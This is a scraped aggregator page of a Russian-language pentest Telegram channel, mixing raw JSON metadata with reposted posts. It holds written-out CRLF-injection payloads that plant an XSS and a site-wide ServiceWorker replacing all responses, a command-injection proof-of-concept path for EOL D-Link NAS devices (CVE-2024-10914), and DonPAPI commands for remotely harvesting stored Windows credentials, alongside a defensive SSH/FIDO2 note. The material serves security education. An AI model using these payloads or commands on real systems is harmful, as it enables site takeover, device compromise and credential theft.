Fsecurity | HH
Ir al canal en Telegram
👾 Канал про КБ и пентест Наш Discord: https://discord.gg/Eg8aDS7Hn7 ✉️ По сотрудничеству: @OxHaskar 🍩 Поддержать: https://www.donationalerts.com/r/xackapb
Mostrar más2 063
Suscriptores
+124 horas
-37 días
-230 días
Archivo de publicaciones
\n\nJS файл\nhttps://example.tld/some/path/foo/bar/?param=x%0D%0AContent-Type:text/javascript%0D%0AContent-Length:7%0D%0A%0D%0AJS_file\n\nНо остается проблема, что запросы, которые контролируются ServiceWorker, будут ограничены его scope.\nТо есть папкой, в которой у нас сработала CRLF Injection. В данном случае это /some/path/foo/bar/, что не очень интересно.\n\nНо если почитать документацию, то можно узнать о заголовке Service-Worker-Allowed, который устанавливается в HTTP ответе вместе с JS кодом воркера, и через который можно переопределить scope. \nЧто в случае с CRLF Injection позволяет зарегистрировать ServiceWorker, расположенный в любой папке, на корень сайта.\n\nДля этого формируем код ServiceWorker с Service-Worker-Allowed:/, который подменяет все HTTP ответы на строку Fake response.\nhttps://example.tld/some/path/foo/bar/?param=x%0D%0AService-Worker-Allowed:/%0D%0AContent-Type:text/javascript%0D%0AContent-Length:162%0D%0A%0D%0Aself.addEventListener(%22fetch%22,function(event){event.respondWith(new%20Response(%22Fake%20response%22,{status:200,statusText:%22OK%22,headers:{%22Content-Type%22:%22text/html%22}}))})\n\nИ подключаем его через XSS.\nhttps://example.tld/some/path/foo/bar/?param=x%0D%0AContent-Type:text/html%0D%0AContent-Length:378%0D%0A%0D%0A%3Cscript%3Enavigator.serviceWorker.register('/some/path/foo/bar/?param=x%250D%250AService-Worker-Allowed:/%250D%250AContent-Type:text/javascript%250D%250AContent-Length:162%250D%250A%250D%250Aself.addEventListener(%2522fetch%2522,function(event){event.respondWith(new%2520Response(%2522Fake%2520response%2522,{status:200,statusText:%2522OK%2522,headers:{%2522Content-Type%2522:%2522text/html%2522}}))})',{scope:'/'})%3C/script%3E\n\nТакже иногда бывает, что не получается сформировать валидный JS ограничивая HTTP ответ по длине с помощью Content-Length. В таком случае можно отбросить лишнее в ответе с помощью формирования HTTP ответа с Transfer-Encoding:chunked.\n\nhttps://example.tld/some/path/foo/bar/?param=x%0D%0AContent-Type:text/javascript%0D%0ATransfer-Encoding:chunked%0D%0A%0D%0A7%0D%0AJS_file%0D%0A0%0D%0A%0D%0A","datePublished":"2024-11-11T12:18:02Z","dateModified":"2024-11-11T12:18:02Z","author":{"@type":"Organization","name":"Fsecurity | HH","url":"https://telemetr.io/es/channels/1492997419-hellohackingteam","image":"https://img.tlmtr.io/c/1D2sPx/5269607332834906944?ty=x"},"publisher":{"@type":"Organization","name":"Fsecurity | HH","url":"https://telemetr.io/es/channels/1492997419-hellohackingteam","image":"https://img.tlmtr.io/c/1D2sPx/5269607332834906944?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":285},{"@type":"InteractionCounter","interactionType":"https://schema.org/ShareAction","userInteractionCount":1}],"sharedContent":{"@type":"SocialMediaPosting","datePublished":"2024-11-10T12:02:16Z"}}},{"@type":"ListItem","position":15,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/es/channels/1492997419-hellohackingteam/posts/3655","url":"https://telemetr.io/es/channels/1492997419-hellohackingteam/posts/3655","mainEntityOfPage":"https://telemetr.io/es/channels/1492997419-hellohackingteam/posts/3655","headline":"🖥 neohtop — это современная кроссплатформенная утилита для мониторинга системы, созданная с использованием Sv…","articleBody":"🖥 neohtop — это современная кроссплатформенная утилита для мониторинга системы, созданная с использованием Svelte, Rust и Tauri!\n\n🌟 Она расширяет возможности классического htop, предлагая современный интерфейс с темной и светлой темами, мониторинг CPU и памяти в реальном времени, поиск и фильтрацию процессов, управление процессами (включая их завершение), а также автообновление системной статистики.\n\n🔐 Лицензия: MIT\n\n🖥 Github\n\n@linuxkalii","datePublished":"2024-11-11T10:09:02Z","dateModified":"2024-11-11T10:09:02Z","author":{"@type":"Organization","name":"Fsecurity | HH","url":"https://telemetr.io/es/channels/1492997419-hellohackingteam","image":"https://img.tlmtr.io/c/1D2sPx/5269607332834906944?ty=x"},"publisher":{"@type":"Organization","name":"Fsecurity | HH","url":"https://telemetr.io/es/channels/1492997419-hellohackingteam","image":"https://img.tlmtr.io/c/1D2sPx/5269607332834906944?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":286}],"sharedContent":{"@type":"SocialMediaPosting","datePublished":"2024-11-10T11:00:28Z"}}},{"@type":"ListItem","position":16,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/es/channels/1492997419-hellohackingteam/posts/3654","url":"https://telemetr.io/es/channels/1492997419-hellohackingteam/posts/3654","mainEntityOfPage":"https://telemetr.io/es/channels/1492997419-hellohackingteam/posts/3654","headline":"🔗Ссылка: https://habr.com/ru/companies/ruvds/articles/853996/","articleBody":"🔗Ссылка:\nhttps://habr.com/ru/companies/ruvds/articles/853996/","datePublished":"2024-11-11T08:03:01Z","dateModified":"2024-11-11T08:03:01Z","author":{"@type":"Organization","name":"Fsecurity | HH","url":"https://telemetr.io/es/channels/1492997419-hellohackingteam","image":"https://img.tlmtr.io/c/1D2sPx/5269607332834906944?ty=x"},"publisher":{"@type":"Organization","name":"Fsecurity | HH","url":"https://telemetr.io/es/channels/1492997419-hellohackingteam","image":"https://img.tlmtr.io/c/1D2sPx/5269607332834906944?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":264}]}},{"@type":"ListItem","position":17,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/es/channels/1492997419-hellohackingteam/posts/3653","url":"https://telemetr.io/es/channels/1492997419-hellohackingteam/posts/3653","mainEntityOfPage":"https://telemetr.io/es/channels/1492997419-hellohackingteam/posts/3653","headline":"🔗Ссылка: https://www.landh.tech/blog/20241028-hidden-supply-chain-links/","articleBody":"🔗Ссылка:\nhttps://www.landh.tech/blog/20241028-hidden-supply-chain-links/","datePublished":"2024-11-10T20:08:01Z","dateModified":"2024-11-10T20:08:01Z","author":{"@type":"Organization","name":"Fsecurity | HH","url":"https://telemetr.io/es/channels/1492997419-hellohackingteam","image":"https://img.tlmtr.io/c/1D2sPx/5269607332834906944?ty=x"},"publisher":{"@type":"Organization","name":"Fsecurity | HH","url":"https://telemetr.io/es/channels/1492997419-hellohackingteam","image":"https://img.tlmtr.io/c/1D2sPx/5269607332834906944?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":267}]}},{"@type":"ListItem","position":18,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/es/channels/1492997419-hellohackingteam/posts/3652","url":"https://telemetr.io/es/channels/1492997419-hellohackingteam/posts/3652","mainEntityOfPage":"https://telemetr.io/es/channels/1492997419-hellohackingteam/posts/3652","headline":"🔗Ссылка: https://habr.com/ru/companies/swordfish_security/articles/857302/","articleBody":"🔗Ссылка:\nhttps://habr.com/ru/companies/swordfish_security/articles/857302/","datePublished":"2024-11-10T18:07:01Z","dateModified":"2024-11-10T18:07:01Z","author":{"@type":"Organization","name":"Fsecurity | HH","url":"https://telemetr.io/es/channels/1492997419-hellohackingteam","image":"https://img.tlmtr.io/c/1D2sPx/5269607332834906944?ty=x"},"publisher":{"@type":"Organization","name":"Fsecurity | HH","url":"https://telemetr.io/es/channels/1492997419-hellohackingteam","image":"https://img.tlmtr.io/c/1D2sPx/5269607332834906944?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":282}]}},{"@type":"ListItem","position":19,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/es/channels/1492997419-hellohackingteam/posts/3651","url":"https://telemetr.io/es/channels/1492997419-hellohackingteam/posts/3651","mainEntityOfPage":"https://telemetr.io/es/channels/1492997419-hellohackingteam/posts/3651","headline":"🔗Ссылка: https://www.ptsecurity.com/ru-ru/research/pt-esc-threat-intelligence/falshivyj-attach-ataki-na-pocht…","articleBody":"🔗Ссылка:\nhttps://www.ptsecurity.com/ru-ru/research/pt-esc-threat-intelligence/falshivyj-attach-ataki-na-pochtovye-servery-roundcube-s-ispolzovaniem-uyazvimosti-cve-2024-37383/#id1","datePublished":"2024-11-10T16:06:01Z","dateModified":"2024-11-10T16:06:01Z","author":{"@type":"Organization","name":"Fsecurity | HH","url":"https://telemetr.io/es/channels/1492997419-hellohackingteam","image":"https://img.tlmtr.io/c/1D2sPx/5269607332834906944?ty=x"},"publisher":{"@type":"Organization","name":"Fsecurity | HH","url":"https://telemetr.io/es/channels/1492997419-hellohackingteam","image":"https://img.tlmtr.io/c/1D2sPx/5269607332834906944?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":244}]}},{"@type":"ListItem","position":20,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/es/channels/1492997419-hellohackingteam/posts/3650","url":"https://telemetr.io/es/channels/1492997419-hellohackingteam/posts/3650","mainEntityOfPage":"https://telemetr.io/es/channels/1492997419-hellohackingteam/posts/3650","headline":"🔗Ссылка: https://github.com/dwisiswant0/ppfuzz","articleBody":"🔗Ссылка:\nhttps://github.com/dwisiswant0/ppfuzz","datePublished":"2024-11-10T14:05:30Z","dateModified":"2024-11-10T14:05:30Z","author":{"@type":"Organization","name":"Fsecurity | HH","url":"https://telemetr.io/es/channels/1492997419-hellohackingteam","image":"https://img.tlmtr.io/c/1D2sPx/5269607332834906944?ty=x"},"publisher":{"@type":"Organization","name":"Fsecurity | HH","url":"https://telemetr.io/es/channels/1492997419-hellohackingteam","image":"https://img.tlmtr.io/c/1D2sPx/5269607332834906944?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":230}]}}]}







2 062
Что такое Airgeddon?
Airgeddon — это мощный набор инструментов с открытым исходным кодом, предназначенный для проведения атак на беспроводные сети (Wi-Fi). Он фокусируется на атаках, которые используют уязвимости в безопасности Wi-Fi, с целью тестирования сетей и их защиты. Этот инструмент является одним из популярных среди специалистов по безопасности и хакеров, изучающих возможности взлома беспроводных сетей. В статье мы разберём, что такое Airgeddon, как он работает и для чего используется.
🔗Ссылка:
https://kraken-academy.ru/book/%D0%A1%D1%82%D0%B0%D1%82%D1%8C%D0%B8%20%F0%9F%93%9C/airgeddon-guide/
2 062
Repost from PurpleBear
Securing SSH with FIDO2
Небольшая заметка про прикладную задачу обеспечения дополнительного уровня контроля для доступа по SSH.
Существует различные способы реализации
2FA для доступа на сервер по SSH с помощью YubiKey:
✅ PIV (Personal Identity Verification) модуль
Суть заключается в том, что публичный и приватный ключ RSA/ ECC создается прямо на YubiKey, им подписывается сертификат для взаимодействия с SSH сервером через интерфейс PKCS #11 https://github.com/Yubico/yubico-piv-tool
ssh -o "PKCS11Provider /usr/local/lib/libykcs11.dylib" user@remote
Проверенный способ, который часто используется в компаниях, к недостаткам которого можно отнести необходимость использования дополнительного софта и ограничение на кол-во слотов на самом девайсе.
✅ OpenPGP
Тут я даже не буду пытаться объяснить как работает GnuPG, а просто передам привет моему преподавателю криптографии😂 В двух словах, это самый хардкорный способ с точки зрения реализации, к преимуществам которого можно отнести возможность импорта существующих ключей и возможность распечатать бэкап на бумаге😎 https://gist.github.com/artizirk/d09ce3570021b0f65469cb450bee5e29
✅ FIDO2
Самый удобный способ, который не требует дополнительного ПО, так как нужна только версия OpenSSH 8.2p1 и выше. В соответствии со стандартом FIDO2 ключи могут храниться на самом девайсе и отдельно:
Резидентские ключи
ssh-keygen -t ed25519-sk -O resident -O application=my_secure_ssh_host -O verify-required
В данном случае ключ вообще никогда не покидает девайс и единственный недостаток это ограничение на кол-во слотов (на моем YubiKey 5 - 25 слотов) а также для более старыx версий прошивки, где используется CTAP (Client to Authenticator Protocol) v2.0 - это отсутствие возможности удалить только один ключ, вместо этого удалятся все 25🙈
Нерезидентские ключи
ssh-keygen -t ed25519-sk
Когда SSH сервер хочет аутентифицировать клиента, он отправляет Credential ID, это зашифрованная AES128 строка, которую расшифровать может только YubiKey, использованный при генерации ключа. Сам процесс происходит за счёт использования мастер-ключа уникального для каждого девайса, поэтому нерезидентские ключи не расходуют слоты и таким образом их количество неограниченно.2 062
Repost from SecuriXy.kz
🔥 Критическая уязвимость в D-Link хранилках 🔥
🚨 CVE-2024-10914 — Обнаружена уязвимость в моделях D-Link DNS-320, DNS-320LW, DNS-325 и DNS-340L (версии до 28 октября 2024 года), позволяющая удалённым злоумышленникам выполнять произвольные команды.
🔴 Детали: Уязвимость связана с недостаточной проверкой параметра name в функции cgi_user_add файла /cgi-bin/account_mgr.cgi?cmd=cgi_user_add, что может привести к выполнению произвольных команд на устройстве.
💡 Рекомендации: D-Link не планирует выпускать обновления для этих моделей, так как они достигли конца жизненного цикла. Рекомендуется заменить устройства на поддерживаемые модели или, как временное решение, ограничить доступ к ним из внешних сетей.
🔗 PoC GitHub
/cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;<INJECTED_SHELL_COMMAND>;%272 062
Repost from Pentest HaT
+2
⌨️ DonPAPI v2.1.0
DPAPI (Data Protection API) - крипто интерфейс в 💻Windows, который обеспечивает программам шифрование их сохраненных данных (пароли, cookie, токены и т.д.)
Данный инструмент позволяет забрать необходимые данные удаленно, написан на 🐍
Собираемые данные:
Chromium браузеры Windows сертификаты Диспетчер УД (Credential Manager) Firefox Mobaxterm MRemoteNg RDC Manager SCCM Vaults VNCУстановка/Запуск:
pipx install donpapi
pipx run donpapi collect -u admin -p 'Password' -d domain.local -t ALL
GUI для просмотра собранных данных:
pipx run donpapi gui
http://127.0.0.1:8088
Поддерживает аутентификацию Kerberos, Pass The Hash
-k
--hashes
--aesKey
🖥 Home
🔠 Секреты DPAPI
#python #donpapi #soft #dpapi
✈️ Pentest HaT 🎩2 062
Repost from BlackFan
Ну и раз я вспомнил что у меня есть Telegram канал - нужно запостить что-то полезное)
Если вы обнаружили CRLF Injection, которая позволяет перезаписать HTTP ответ и сделать XSS, - то ее импакт можно увеличить с помощью ServiceWorker.
Для регистрации ServiceWorker необходимо:
1) Иметь возможность выполнения JavaScript в контексте сайта
2) Наличие JavaScript файла на сервере с корректным Content-Type
Используя CRLF Injection оба этих условия легко выполняются:
XSS
https://example.tld/some/path/foo/bar/?param=x%0D%0AContent-Type:text/html%0D%0AContent-Length:20%0D%0A%0D%0A<script>XSS</script>JS файл
https://example.tld/some/path/foo/bar/?param=x%0D%0AContent-Type:text/javascript%0D%0AContent-Length:7%0D%0A%0D%0AJS_fileНо остается проблема, что запросы, которые контролируются ServiceWorker, будут ограничены его scope. То есть папкой, в которой у нас сработала CRLF Injection. В данном случае это /some/path/foo/bar/, что не очень интересно. Но если почитать документацию, то можно узнать о заголовке Service-Worker-Allowed, который устанавливается в HTTP ответе вместе с JS кодом воркера, и через который можно переопределить scope. Что в случае с CRLF Injection позволяет зарегистрировать ServiceWorker, расположенный в любой папке, на корень сайта. Для этого формируем код ServiceWorker с
Service-Worker-Allowed:/, который подменяет все HTTP ответы на строку Fake response.
https://example.tld/some/path/foo/bar/?param=x%0D%0AService-Worker-Allowed:/%0D%0AContent-Type:text/javascript%0D%0AContent-Length:162%0D%0A%0D%0Aself.addEventListener(%22fetch%22,function(event){event.respondWith(new%20Response(%22Fake%20response%22,{status:200,statusText:%22OK%22,headers:{%22Content-Type%22:%22text/html%22}}))})
И подключаем его через XSS.
https://example.tld/some/path/foo/bar/?param=x%0D%0AContent-Type:text/html%0D%0AContent-Length:378%0D%0A%0D%0A%3Cscript%3Enavigator.serviceWorker.register('/some/path/foo/bar/?param=x%250D%250AService-Worker-Allowed:/%250D%250AContent-Type:text/javascript%250D%250AContent-Length:162%250D%250A%250D%250Aself.addEventListener(%2522fetch%2522,function(event){event.respondWith(new%2520Response(%2522Fake%2520response%2522,{status:200,statusText:%2522OK%2522,headers:{%2522Content-Type%2522:%2522text/html%2522}}))})',{scope:'/'})%3C/script%3E
Также иногда бывает, что не получается сформировать валидный JS ограничивая HTTP ответ по длине с помощью Content-Length. В таком случае можно отбросить лишнее в ответе с помощью формирования HTTP ответа с Transfer-Encoding:chunked.
https://example.tld/some/path/foo/bar/?param=x%0D%0AContent-Type:text/javascript%0D%0ATransfer-Encoding:chunked%0D%0A%0D%0A7%0D%0AJS_file%0D%0A0%0D%0A%0D%0A
2 062
Repost from Kali Linux
🖥 neohtop — это современная кроссплатформенная утилита для мониторинга системы, созданная с использованием Svelte, Rust и Tauri!
🌟 Она расширяет возможности классического htop, предлагая современный интерфейс с темной и светлой темами, мониторинг CPU и памяти в реальном времени, поиск и фильтрацию процессов, управление процессами (включая их завершение), а также автообновление системной статистики.
🔐 Лицензия: MIT
🖥 Github
@linuxkalii
